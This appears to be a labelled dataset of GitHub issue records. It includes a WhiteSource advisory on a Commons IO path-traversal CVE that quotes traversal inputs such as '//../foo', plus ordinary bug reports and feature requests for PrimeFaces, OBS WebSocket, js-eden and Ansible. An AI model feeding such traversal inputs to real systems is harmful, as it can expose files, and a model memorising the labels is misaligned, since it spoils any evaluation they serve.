2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425","cvss3Severity":"medium","cvss3Score":"5.3","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Unchanged","C":"Low","UI":"None","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
True
CVE-2021-29425 (Medium) detected in commons-io-2.6.jar, commons-io-2.5.jar - ## CVE-2021-29425 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>commons-io-2.6.jar</b>, <b>commons-io-2.5.jar</b></p></summary> <p> <details><summary><b>commons-io-2.6.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-route/pom.xml</p> <p>Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,canner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.6/commons-io-2.6.jar,SEARCH-NCJIS-nibrs/web/nibrs-web/target/nibrs-web/WEB-INF/lib/commons-io-2.6.jar</p> <p> Dependency Hierarchy: - tika-parsers-1.18.jar (Root Library) - :x: **commons-io-2.6.jar** (Vulnerable Library) </details> <details><summary><b>commons-io-2.5.jar</b></p></summary> <p>The Apache Commons IO library contains utility classes, stream 
implementations, file filters, file comparators, endian transformation classes, and much more.</p> <p>Library home page: <a href="http://commons.apache.org/proper/commons-io/">http://commons.apache.org/proper/commons-io/</a></p> <p>Path to dependency file: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/pom.xml</p> <p>Path to vulnerable library: SEARCH-NCJIS-nibrs/tools/nibrs-fbi-service/target/nibrs-fbi-service-1.0.0/WEB-INF/lib/commons-io-2.5.jar,/home/wss-scanner/.m2/repository/commons-io/commons-io/2.5/commons-io-2.5.jar</p> <p> Dependency Hierarchy: - :x: **commons-io-2.5.jar** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/samq-ghdemo/SEARCH-NCJIS-nibrs/commit/2643373aa9a184ff4ea81e98caf4009bf2ee8e91">2643373aa9a184ff4ea81e98caf4009bf2ee8e91</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like "//../foo", or "\\..\foo", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus "limited" path traversal), if the calling code would use the result to construct a path value. 
<p>Publish Date: 2021-04-13 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425>CVE-2021-29425</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.3</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: Low - Integrity Impact: None - Availability Impact: None </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29425</a></p> <p>Release Date: 2021-04-13</p> <p>Fix Resolution: commons-io:commons-io:2.7</p> </p> </details> <p></p> <!-- 
<REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.6","packageFilePaths":["/tools/nibrs-route/pom.xml","/tools/nibrs-flatfile/pom.xml","/tools/nibrs-staging-data-common/pom.xml","/web/nibrs-web/pom.xml","/tools/nibrs-summary-report-common/pom.xml","/tools/nibrs-summary-report/pom.xml","/tools/nibrs-xmlfile/pom.xml","/tools/nibrs-common/pom.xml","/tools/nibrs-validate-common/pom.xml","/tools/nibrs-staging-data/pom.xml","/tools/nibrs-validation/pom.xml"],"isTransitiveDependency":true,"dependencyTree":"org.apache.tika:tika-parsers:1.18;commons-io:commons-io:2.6","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"},{"packageType":"Java","groupId":"commons-io","packageName":"commons-io","packageVersion":"2.5","packageFilePaths":["/tools/nibrs-fbi-service/pom.xml"],"isTransitiveDependency":false,"dependencyTree":"commons-io:commons-io:2.5","isMinimumFixVersionAvailable":true,"minimumFixVersion":"commons-io:commons-io:2.7"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2021-29425","vulnerabilityDetails":"In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-29425","cvss3Severity":"medium","cvss3Score":"5.3","cvss3Metrics":{"A":"None","AC":"Low","PR":"None","S":"Unchanged","C":"Low","UI":"None","AV":"Network","I":"None"},"extraData":{}}</REMEDIATE> -->
non_main
cve medium detected in commons io jar commons io jar cve medium severity vulnerability vulnerable libraries commons io jar commons io jar commons io jar the apache commons io library contains utility classes stream implementations file filters file comparators endian transformation classes and much more library home page a href path to dependency file search ncjis nibrs tools nibrs route pom xml path to vulnerable library home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar canner repository commons io commons io commons io jar home wss scanner repository commons io commons io commons io jar search ncjis nibrs web nibrs web target nibrs web web inf lib commons io jar dependency hierarchy tika parsers jar root library x commons io jar vulnerable library commons io jar the apache commons io library contains utility classes stream implementations file filters file comparators endian transformation classes and much more library home page a href path to dependency file search ncjis nibrs tools nibrs fbi service pom xml path to vulnerable library search ncjis nibrs tools nibrs fbi service target nibrs fbi service web inf lib commons io jar home wss scanner repository commons io commons io commons io jar dependency hierarchy x commons io jar vulnerable library found in head commit a href found in base branch master vulnerability details in apache commons io before when invoking the method filenameutils normalize with an improper input string like foo 
or foo the result would be the same value thus possibly providing access to files in the parent directory but not further above thus limited path traversal if the calling code would use the result to construct a path value publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact low integrity impact none availability impact none for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution commons io commons io isopenpronvulnerability false ispackagebased true isdefaultbranch true packages istransitivedependency true dependencytree org apache tika tika parsers commons io commons io isminimumfixversionavailable true minimumfixversion commons io commons io packagetype java groupid commons io packagename commons io packageversion packagefilepaths istransitivedependency false dependencytree commons io commons io isminimumfixversionavailable true minimumfixversion commons io commons io basebranches vulnerabilityidentifier cve vulnerabilitydetails in apache commons io before when invoking the method filenameutils normalize with an improper input string like foo or foo the result would be the same value thus possibly providing access to files in the parent directory but not further above thus limited path traversal if the calling code would use the result to construct a path value vulnerabilityurl
0
63,839
18,014,055,881
IssuesEvent
2021-09-16 12:02:55
primefaces/primefaces
https://api.github.com/repos/primefaces/primefaces
opened
selectonemenu filter="true" causes dropdown to collapse immediately
defect
**Describe the defect** When creating a SelectOneMenu that allows filtering via a textfield (property `filter="true"`), the menu immediately collapses on mobile devices after opening. **Environment:** - PF Version: _10.0_ - Server: _Payara 5.194_ - Affected browsers: _e.g. Chrome on Android (and Desktop in mobile mode), Firefox on Android_ - Unaffected browsers: _e.g. Chrome on Desktop, Firefox on Desktop (and in mobile mode)_ **To Reproduce** Steps to reproduce the behavior: 1. Have a filterable `p:selectOneMenu` 2. Try to expand it by tapping on it **Expected behavior** The menu expands. Searching and selecting should be possible as it is in desktop browsers. **Actual behaviour (Chrome on Android /)** The menu as well as the keyboard collapses. **Actual behaviour (Chrome)** The menu collapses, but the keyboard remains open. **Example XHTML** ```html <p:selectOneMenu id="parent" value="#{categoryBean.parent}" style="width: 100%;" filter="true" filterMatchMode="contains"> <f:selectItems value="#{categoryBean.parents}" var="parent" itemLabel="#{parent}" itemValue="#{parent}" /> </p:selectOneMenu> ``` **Example Bean** ```java @Named @ViewScoped public class CategoryBean implements Serializable { @Getter @Setter private List<String> parents = List.of("One", "Two", "Three"); @Getter @Setter private String parent; } ```
1.0
selectonemenu filter="true" causes dropdown to collapse immediately - **Describe the defect** When creating a SelectOneMenu that allows filtering via a textfield (property `filter="true"`), the menu immediately collapses on mobile devices after opening. **Environment:** - PF Version: _10.0_ - Server: _Payara 5.194_ - Affected browsers: _e.g. Chrome on Android (and Desktop in mobile mode), Firefox on Android_ - Unaffected browsers: _e.g. Chrome on Desktop, Firefox on Desktop (and in mobile mode)_ **To Reproduce** Steps to reproduce the behavior: 1. Have a filterable `p:selectOneMenu` 2. Try to expand it by tapping on it **Expected behavior** The menu expands. Searching and selecting should be possible as it is in desktop browsers. **Actual behaviour (Chrome on Android /)** The menu as well as the keyboard collapses. **Actual behaviour (Chrome)** The menu collapses, but the keyboard remains open. **Example XHTML** ```html <p:selectOneMenu id="parent" value="#{categoryBean.parent}" style="width: 100%;" filter="true" filterMatchMode="contains"> <f:selectItems value="#{categoryBean.parents}" var="parent" itemLabel="#{parent}" itemValue="#{parent}" /> </p:selectOneMenu> ``` **Example Bean** ```java @Named @ViewScoped public class CategoryBean implements Serializable { @Getter @Setter private List<String> parents = List.of("One", "Two", "Three"); @Getter @Setter private String parent; } ```
non_main
selectonemenu filter true causes dropdown to collapse immediately describe the defect when creating a selectonemenu that allows filtering via a textfield property filter true the menu immediately collapses on mobile devices after opening environment pf version server payara affected browsers e g chrome on android and desktop in mobile mode firefox on android unaffected browsers e g chrome on desktop firefox on desktop and in mobile mode to reproduce steps to reproduce the behavior have a filterable p selectonemenu try to expand it by tapping on it expected behavior the menu expands searching and selecting should be possible as it is in desktop browsers actual behaviour chrome on android the menu as well as the keyboard collapses actual behaviour chrome the menu collapses but the keyboard remains open example xhtml html p selectonemenu id parent value categorybean parent style width filter true filtermatchmode contains example bean java named viewscoped public class categorybean implements serializable getter setter private list parents list of one two three getter setter private string parent
0
423,424
28,508,461,467
IssuesEvent
2023-04-19 00:41:04
anthonyrave/riot-api-connector
https://api.github.com/repos/anthonyrave/riot-api-connector
closed
Create a documentation
documentation
The package requires a documentation to help developers to use it. - [ ] Create a documentation repository - [ ] Deploy the documentation on the web
1.0
Create a documentation - The package requires a documentation to help developers to use it. - [ ] Create a documentation repository - [ ] Deploy the documentation on the web
non_main
create a documentation the package requires a documentation to help developers to use it create a documentation repository deploy the documentation on the web
0
4,776
24,599,093,464
IssuesEvent
2022-10-14 10:51:56
obs-websocket-community-projects/obs-websocket-java
https://api.github.com/repos/obs-websocket-community-projects/obs-websocket-java
closed
Support OBS WebSocket 5.X
help wanted maintainability 5.X.X Support
# Description The 5.X version is approaching and is bringing breaking changes. # Status - Requests and Responses - General - [x] GetVersion - [x] BroadcastCustomEvent - [x] GetStats - [x] GetHotkeyList - [x] TriggerHotkeyByName - [x] TriggerHotkeyByKeySequence - [x] GetProjectorList - [x] OpenProjector - [x] CloseProjector - [x] GetStudioModeEnabled - [x] SetStudioModeEnabled - [x] Sleep - Config - [x] GetPersistentData - [x] SetPersistentData - [x] ~~GetGlobalPersistentData~~ - [x] ~~SetGlobalPersistentData~~ - [x] GetSceneCollectionList - [x] SetCurrentSceneCollection - [x] CreateSceneCollection - [x] RemoveSceneCollection - [x] GetProfileList - [x] SetCurrentProfile - [x] CreateProfile - [x] RemoveProfile - [x] GetProfileParameter - [x] SetProfileParameter - [x] ~~GetProfilePersistentData~~ - [x] ~~SetProfilePersistentData~~ - [x] GetVideoSettings - [x] SetVideoSettings - [x] GetStreamServiceSettings - [x] SetStreamServiceSettings - [ ] GetStreamBitrateSetting - [ ] SetStreamBitrateSetting - Sources - [ ] GetSourceList - [x] GetSourceActive - [x] GetSourceScreenshot - [x] SaveSourceScreenshot - Scenes - [x] GetSceneList - [x] GetCurrentProgramScene - [x] SetCurrentProgramScene - [x] GetCurrentPreviewScene - [x] SetCurrentPreviewScene - [x] CreateScene - [x] RemoveScene - [x] SetSceneName - [ ] ~~SetSceneIndex~~ - [x] GetSceneTransitionOverride - [x] SetSceneTransitionOverride - [x] DeleteSceneTransitionOverride - Inputs - [x] GetInputList - [x] CreateInput - [x] RemoveInput - [x] SetInputName - [x] GetInputKindList - [x] GetSpecialInputNames - [x] GetInputDefaultSettings - [x] GetInputSettings - [x] SetInputSettings - [x] GetInputMute - [x] SetInputMute - [x] ToggleInputMute - [x] GetInputVolume - [x] SetInputVolume - [x] GetInputAudioSyncOffset - [x] SetInputAudioSyncOffset - [x] GetInputTracks - [ ] SetInputTracks - [x] GetInputMonitorType - [x] SetInputMonitorType - [x] GetInputPropertiesListPropertyItems - [x] PressInputPropertiesButton - Transitions - [x] 
GetTransitionList - [x] GetCurrentTransition - [x] SetCurrentTransition - [ ] CreateTransition - [ ] RemoveTransition - [x] SetCurrentTransitionDuration - [x] GetTransitionSettings - [x] SetTransitionSettings - [x] ReleaseTbar - [x] SetTbarPosition - [x] TriggerStudioModeTransition - Filters - [x] GetSourceFilterList - [x] CreateSourceFilter - [x] RemoveSourceFilter - [ ] GetSourceFilterDefaultSettings - [x] GetSourceFilter - [x] SetSourceFilterIndex - [x] SetSourceFilterSettings - [x] SetSourceFilterEnabled - Scene Items - [x] GetSceneItemList - [x] GetGroupSceneItemList - [x] CreateSceneItem - [x] RemoveSceneItem - [x] DuplicateSceneItem - [x] GetSceneItemTransform - [x] SetSceneItemTransform - [x] GetSceneItemEnabled - [x] SetSceneItemEnabled - [x] GetSceneItemLocked - [x] SetSceneItemLocked - [ ] SetSceneItemColor - [x] GetSceneItemColor - [x] SetSceneItemIndex - Outputs - [ ] GetVirtualCamStatus - [ ] ToggleVirtualCam - [ ] StartVirtualCam - [ ] StopVirtualCam - [x] GetReplayBufferStatus - [x] ToggleReplayBuffer - [ ] StartReplayBuffer - [x] StopReplayBuffer - [x] SaveReplayBuffer - [x] GetLastReplayBufferReplay - [ ] GetReplayBufferTime - [ ] SetReplayBufferTime - [x] GetOutputList - [ ] GetOutputStatus - [x] ToggleOutput - [x] StartOutput - [x] StopOutput - [ ] GetOutputSettings - [ ] SetOutputSettings - Stream - [x] GetStreamStatus - [x] ToggleStream - [x] StartStream - [x] StopStream - [x] SendStreamCaption - Record - [x] GetRecordStatus - [x] ToggleRecord - [x] StartRecord - [x] StopRecord - [x] ToggleRecordPause - [x] PauseRecord - [x] ResumeRecord - [x] GetRecordDirectory - [x] SetRecordDirectory - [x] GetRecordFilenameFormatting - [x] SetRecordFilenameFormatting - Media Inputs - [x] GetMediaInputStatus - [x] OffsetMediaInputTimecode - [x] SetMediaInputTimecode - [x] SetMediaInputPauseState - [x] StopMediaInput - [x] RestartMediaInput - [x] NextMediaInputPlaylistItem - [x] PreviousMediaInputPlaylistItem - Events - General - [x] ExitStarted - [x] 
StudioModeStateChanged - [x] CustomEvent - Config - [x] CurrentSceneCollectionChanged - [x] SceneCollectionListChanged - [x] CurrentProfileChanged - [x] ProfileListChanged - Scenes - [x] SceneCreated - [x] SceneRemoved - [x] SceneNameChanged - [x] ~~CurrentSceneChanged~~ - [x] CurrentProgramSceneChanged - [x] CurrentPreviewSceneChanged - [x] SceneListChanged - Inputs - [x] InputCreated - [x] InputRemoved - [x] InputNameChanged - [x] InputMuteStateChanged - [x] InputVolumeChanged - [x] InputAudioSyncOffsetChanged - [x] InputAudioTracksChanged - Transitions - [ ] TransitionCreated - [ ] TransitionRemoved - [ ] TransitionNameChanged - [ ] CurrentTransitionChanged - [ ] TransitionStarted - [ ] TransitionEnded - Filters - [ ] FilterCreated - [ ] FilterRemoved - [ ] FilterNameChanged - [ ] SourceFilterAdded - [ ] SourceFilterRemoved - [ ] SourceFilterListReindexed - Outputs - [x] StreamStateChanged - [x] RecordStateChanged - [x] ReplayBufferStateChanged - [x] VirtualcamStateChanged - [x] ReplayBufferSaved - Scene Items - [x] SceneItemCreated - [x] SceneItemRemoved - [x] SceneItemListReindexed - [x] SceneItemEnableStateChanged - [x] SceneItemLockStateChanged - [ ] SceneItemTransformChanged - Media Inputs - [x] MediaInputPlaybackStarted - [x] MediaInputPlaybackEnded - [x] MediaInputActionTriggered - High Volume - [x] InputVolumeMeters - [x] InputActiveStateChanged - [x] InputShowStateChanged
True
Support OBS WebSocket 5.X - # Description The 5.X version is approaching and is bringing breaking changes. # Status - Requests and Responses - General - [x] GetVersion - [x] BroadcastCustomEvent - [x] GetStats - [x] GetHotkeyList - [x] TriggerHotkeyByName - [x] TriggerHotkeyByKeySequence - [x] GetProjectorList - [x] OpenProjector - [x] CloseProjector - [x] GetStudioModeEnabled - [x] SetStudioModeEnabled - [x] Sleep - Config - [x] GetPersistentData - [x] SetPersistentData - [x] ~~GetGlobalPersistentData~~ - [x] ~~SetGlobalPersistentData~~ - [x] GetSceneCollectionList - [x] SetCurrentSceneCollection - [x] CreateSceneCollection - [x] RemoveSceneCollection - [x] GetProfileList - [x] SetCurrentProfile - [x] CreateProfile - [x] RemoveProfile - [x] GetProfileParameter - [x] SetProfileParameter - [x] ~~GetProfilePersistentData~~ - [x] ~~SetProfilePersistentData~~ - [x] GetVideoSettings - [x] SetVideoSettings - [x] GetStreamServiceSettings - [x] SetStreamServiceSettings - [ ] GetStreamBitrateSetting - [ ] SetStreamBitrateSetting - Sources - [ ] GetSourceList - [x] GetSourceActive - [x] GetSourceScreenshot - [x] SaveSourceScreenshot - Scenes - [x] GetSceneList - [x] GetCurrentProgramScene - [x] SetCurrentProgramScene - [x] GetCurrentPreviewScene - [x] SetCurrentPreviewScene - [x] CreateScene - [x] RemoveScene - [x] SetSceneName - [ ] ~~SetSceneIndex~~ - [x] GetSceneTransitionOverride - [x] SetSceneTransitionOverride - [x] DeleteSceneTransitionOverride - Inputs - [x] GetInputList - [x] CreateInput - [x] RemoveInput - [x] SetInputName - [x] GetInputKindList - [x] GetSpecialInputNames - [x] GetInputDefaultSettings - [x] GetInputSettings - [x] SetInputSettings - [x] GetInputMute - [x] SetInputMute - [x] ToggleInputMute - [x] GetInputVolume - [x] SetInputVolume - [x] GetInputAudioSyncOffset - [x] SetInputAudioSyncOffset - [x] GetInputTracks - [ ] SetInputTracks - [x] GetInputMonitorType - [x] SetInputMonitorType - [x] GetInputPropertiesListPropertyItems - [x] 
PressInputPropertiesButton - Transitions - [x] GetTransitionList - [x] GetCurrentTransition - [x] SetCurrentTransition - [ ] CreateTransition - [ ] RemoveTransition - [x] SetCurrentTransitionDuration - [x] GetTransitionSettings - [x] SetTransitionSettings - [x] ReleaseTbar - [x] SetTbarPosition - [x] TriggerStudioModeTransition - Filters - [x] GetSourceFilterList - [x] CreateSourceFilter - [x] RemoveSourceFilter - [ ] GetSourceFilterDefaultSettings - [x] GetSourceFilter - [x] SetSourceFilterIndex - [x] SetSourceFilterSettings - [x] SetSourceFilterEnabled - Scene Items - [x] GetSceneItemList - [x] GetGroupSceneItemList - [x] CreateSceneItem - [x] RemoveSceneItem - [x] DuplicateSceneItem - [x] GetSceneItemTransform - [x] SetSceneItemTransform - [x] GetSceneItemEnabled - [x] SetSceneItemEnabled - [x] GetSceneItemLocked - [x] SetSceneItemLocked - [ ] SetSceneItemColor - [x] GetSceneItemColor - [x] SetSceneItemIndex - Outputs - [ ] GetVirtualCamStatus - [ ] ToggleVirtualCam - [ ] StartVirtualCam - [ ] StopVirtualCam - [x] GetReplayBufferStatus - [x] ToggleReplayBuffer - [ ] StartReplayBuffer - [x] StopReplayBuffer - [x] SaveReplayBuffer - [x] GetLastReplayBufferReplay - [ ] GetReplayBufferTime - [ ] SetReplayBufferTime - [x] GetOutputList - [ ] GetOutputStatus - [x] ToggleOutput - [x] StartOutput - [x] StopOutput - [ ] GetOutputSettings - [ ] SetOutputSettings - Stream - [x] GetStreamStatus - [x] ToggleStream - [x] StartStream - [x] StopStream - [x] SendStreamCaption - Record - [x] GetRecordStatus - [x] ToggleRecord - [x] StartRecord - [x] StopRecord - [x] ToggleRecordPause - [x] PauseRecord - [x] ResumeRecord - [x] GetRecordDirectory - [x] SetRecordDirectory - [x] GetRecordFilenameFormatting - [x] SetRecordFilenameFormatting - Media Inputs - [x] GetMediaInputStatus - [x] OffsetMediaInputTimecode - [x] SetMediaInputTimecode - [x] SetMediaInputPauseState - [x] StopMediaInput - [x] RestartMediaInput - [x] NextMediaInputPlaylistItem - [x] PreviousMediaInputPlaylistItem - 
Events - General - [x] ExitStarted - [x] StudioModeStateChanged - [x] CustomEvent - Config - [x] CurrentSceneCollectionChanged - [x] SceneCollectionListChanged - [x] CurrentProfileChanged - [x] ProfileListChanged - Scenes - [x] SceneCreated - [x] SceneRemoved - [x] SceneNameChanged - [x] ~~CurrentSceneChanged~~ - [x] CurrentProgramSceneChanged - [x] CurrentPreviewSceneChanged - [x] SceneListChanged - Inputs - [x] InputCreated - [x] InputRemoved - [x] InputNameChanged - [x] InputMuteStateChanged - [x] InputVolumeChanged - [x] InputAudioSyncOffsetChanged - [x] InputAudioTracksChanged - Transitions - [ ] TransitionCreated - [ ] TransitionRemoved - [ ] TransitionNameChanged - [ ] CurrentTransitionChanged - [ ] TransitionStarted - [ ] TransitionEnded - Filters - [ ] FilterCreated - [ ] FilterRemoved - [ ] FilterNameChanged - [ ] SourceFilterAdded - [ ] SourceFilterRemoved - [ ] SourceFilterListReindexed - Outputs - [x] StreamStateChanged - [x] RecordStateChanged - [x] ReplayBufferStateChanged - [x] VirtualcamStateChanged - [x] ReplayBufferSaved - Scene Items - [x] SceneItemCreated - [x] SceneItemRemoved - [x] SceneItemListReindexed - [x] SceneItemEnableStateChanged - [x] SceneItemLockStateChanged - [ ] SceneItemTransformChanged - Media Inputs - [x] MediaInputPlaybackStarted - [x] MediaInputPlaybackEnded - [x] MediaInputActionTriggered - High Volume - [x] InputVolumeMeters - [x] InputActiveStateChanged - [x] InputShowStateChanged
main
support obs websocket x description the x version is approaching and is bringing breaking changes status requests and responses general getversion broadcastcustomevent getstats gethotkeylist triggerhotkeybyname triggerhotkeybykeysequence getprojectorlist openprojector closeprojector getstudiomodeenabled setstudiomodeenabled sleep config getpersistentdata setpersistentdata getglobalpersistentdata setglobalpersistentdata getscenecollectionlist setcurrentscenecollection createscenecollection removescenecollection getprofilelist setcurrentprofile createprofile removeprofile getprofileparameter setprofileparameter getprofilepersistentdata setprofilepersistentdata getvideosettings setvideosettings getstreamservicesettings setstreamservicesettings getstreambitratesetting setstreambitratesetting sources getsourcelist getsourceactive getsourcescreenshot savesourcescreenshot scenes getscenelist getcurrentprogramscene setcurrentprogramscene getcurrentpreviewscene setcurrentpreviewscene createscene removescene setscenename setsceneindex getscenetransitionoverride setscenetransitionoverride deletescenetransitionoverride inputs getinputlist createinput removeinput setinputname getinputkindlist getspecialinputnames getinputdefaultsettings getinputsettings setinputsettings getinputmute setinputmute toggleinputmute getinputvolume setinputvolume getinputaudiosyncoffset setinputaudiosyncoffset getinputtracks setinputtracks getinputmonitortype setinputmonitortype getinputpropertieslistpropertyitems pressinputpropertiesbutton transitions gettransitionlist getcurrenttransition setcurrenttransition createtransition removetransition setcurrenttransitionduration gettransitionsettings settransitionsettings releasetbar settbarposition triggerstudiomodetransition filters getsourcefilterlist createsourcefilter removesourcefilter getsourcefilterdefaultsettings getsourcefilter setsourcefilterindex setsourcefiltersettings setsourcefilterenabled scene items getsceneitemlist getgroupsceneitemlist 
createsceneitem removesceneitem duplicatesceneitem getsceneitemtransform setsceneitemtransform getsceneitemenabled setsceneitemenabled getsceneitemlocked setsceneitemlocked setsceneitemcolor getsceneitemcolor setsceneitemindex outputs getvirtualcamstatus togglevirtualcam startvirtualcam stopvirtualcam getreplaybufferstatus togglereplaybuffer startreplaybuffer stopreplaybuffer savereplaybuffer getlastreplaybufferreplay getreplaybuffertime setreplaybuffertime getoutputlist getoutputstatus toggleoutput startoutput stopoutput getoutputsettings setoutputsettings stream getstreamstatus togglestream startstream stopstream sendstreamcaption record getrecordstatus togglerecord startrecord stoprecord togglerecordpause pauserecord resumerecord getrecorddirectory setrecorddirectory getrecordfilenameformatting setrecordfilenameformatting media inputs getmediainputstatus offsetmediainputtimecode setmediainputtimecode setmediainputpausestate stopmediainput restartmediainput nextmediainputplaylistitem previousmediainputplaylistitem events general exitstarted studiomodestatechanged customevent config currentscenecollectionchanged scenecollectionlistchanged currentprofilechanged profilelistchanged scenes scenecreated sceneremoved scenenamechanged currentscenechanged currentprogramscenechanged currentpreviewscenechanged scenelistchanged inputs inputcreated inputremoved inputnamechanged inputmutestatechanged inputvolumechanged inputaudiosyncoffsetchanged inputaudiotrackschanged transitions transitioncreated transitionremoved transitionnamechanged currenttransitionchanged transitionstarted transitionended filters filtercreated filterremoved filternamechanged sourcefilteradded sourcefilterremoved sourcefilterlistreindexed outputs streamstatechanged recordstatechanged replaybufferstatechanged virtualcamstatechanged replaybuffersaved scene items sceneitemcreated sceneitemremoved sceneitemlistreindexed sceneitemenablestatechanged sceneitemlockstatechanged sceneitemtransformchanged media 
inputs mediainputplaybackstarted mediainputplaybackended mediainputactiontriggered high volume inputvolumemeters inputactivestatechanged inputshowstatechanged
1
3,686
15,055,160,193
IssuesEvent
2021-02-03 18:24:01
EMGroup/js-eden
https://api.github.com/repos/EMGroup/js-eden
closed
Use arrays not dicts for dependencies and subscribers
Construit maintainer
Symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array. So switch these to arrays, keeping in mind that duplicates must be avoided.
True
Use arrays not dicts for dependencies and subscribers - Symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array. So switch these to arrays, keeping in mind that duplicates must be avoided.
main
use arrays not dicts for dependencies and subscribers symbol dependencies and subscribers are using dictionary objects when the primary operation on them it iteration which would be far faster with an array so switch these to arrays keeping in mind that duplicates must be avoided
1
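The js-eden record above proposes replacing dictionary objects with arrays for symbol dependencies and subscribers, since the hot path is iteration, while guarding against duplicate entries on insert. A minimal Python sketch of that trade-off (illustrative names only — this is not js-eden's actual `Symbol` API):

```python
class Symbol:
    """Sketch of array-based subscriber tracking, as proposed in the
    js-eden issue: iterate cheaply, deduplicate on insert."""

    def __init__(self, name):
        self.name = name
        self.subscribers = []  # array, because iteration is the primary operation

    def subscribe(self, other):
        # Duplicates must be avoided, as the issue notes: a membership
        # check on insert keeps the frequent iteration a plain loop.
        if other not in self.subscribers:
            self.subscribers.append(other)

    def notify(self):
        # Primary operation: walk every subscriber once.
        return [s.name for s in self.subscribers]


a, b = Symbol("a"), Symbol("b")
a.subscribe(b)
a.subscribe(b)  # second call is ignored, no duplicate is stored
print(a.notify())
```

The insert-time check is O(n), which the issue implicitly accepts because subscription changes are rare compared to dependency-graph traversal.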
1,249
5,308,982,658
IssuesEvent
2017-02-12 04:07:02
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
vmware_guest.py implement datastore cluster support
affects_2.2 cloud feature_idea vmware waiting_on_maintainer
##### ISSUE TYPE - Feature Idea ##### COMPONENT NAME vmware_guest.py ##### ANSIBLE VERSION ``` ansible 2.2.0 ``` ##### CONFIGURATION Default configuration ##### OS / ENVIRONMENT N/A ##### SUMMARY This module should support datastore clusters in a vsphere environment. In order to deploy a template should be excellent not specify the datastore but specify the datastore cluster and automatically use SDRS funcionality to allocate the requiered resources. ``` def deploy_template(self, poweron=False, wait_for_ip=False): # FIXME: # - clusters # - multiple datacenters # - resource pools # - multiple templates by the same name # - use disk config from template by default # - static IPs ``` ##### STEPS TO REPRODUCE N/A ##### EXPECTED RESULTS N/A ##### ACTUAL RESULTS ``` N/A ```
True
